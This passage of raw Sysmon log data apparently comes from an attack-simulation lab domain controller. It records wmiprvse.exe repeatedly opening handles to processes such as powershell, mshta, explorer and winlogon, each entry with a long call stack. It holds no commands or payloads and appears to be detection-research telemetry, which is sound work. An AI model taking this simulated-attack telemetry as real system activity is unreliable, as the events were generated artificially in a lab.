-EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x800000000000000025823Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.835{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5363-6008-5E06-00000000A301}7124C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025822Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.835{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5363-6008-5D06-00000000A301}6844C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025821Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.835{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5363-6008-5C06-00000000A301}4084C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025820Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.819{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025819Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.819{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025818Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.819{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025817Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.819{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025816Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.819{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025815Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.819{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025814Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.819{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025813Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.819{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025812Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.819{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025811Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.819{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025810Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.819{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025809Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.819{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025808Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.819{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025807Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.819{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025806Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.819{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025805Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.819{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025804Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.819{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\